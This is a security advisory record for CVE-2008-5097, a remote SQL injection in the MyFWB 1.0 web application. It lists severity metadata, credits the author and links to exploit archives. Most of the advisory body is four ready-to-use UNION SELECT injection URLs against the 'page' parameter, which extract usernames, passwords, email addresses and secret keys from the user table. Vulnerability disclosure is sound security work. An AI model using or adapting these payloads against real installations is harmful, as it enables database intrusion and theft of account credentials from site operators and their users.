Topic : | MyFWB 1.0 Remote SQL Injection
|
SecurityAlert : 4597
CVE : CVE-2008-5097
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Guns 0x90
Published : 18.11.2008
Affected Software : | myfwb:myfwb:1.0 |
 Advisory Content : MyFWB 1.0 Remote SQL Injection
Author: 0x90
url: www.0x90.com.ar
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar
Username:
http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user
Password:
http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user
Email:
http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user
Secret Key:
http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
References :
http://www.securityfocus.com/bid/31269
http://www.securityfocus.com/archive/1/archive/1/496553/100/0/threaded
http://www.milw0rm.com/exploits/6501
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|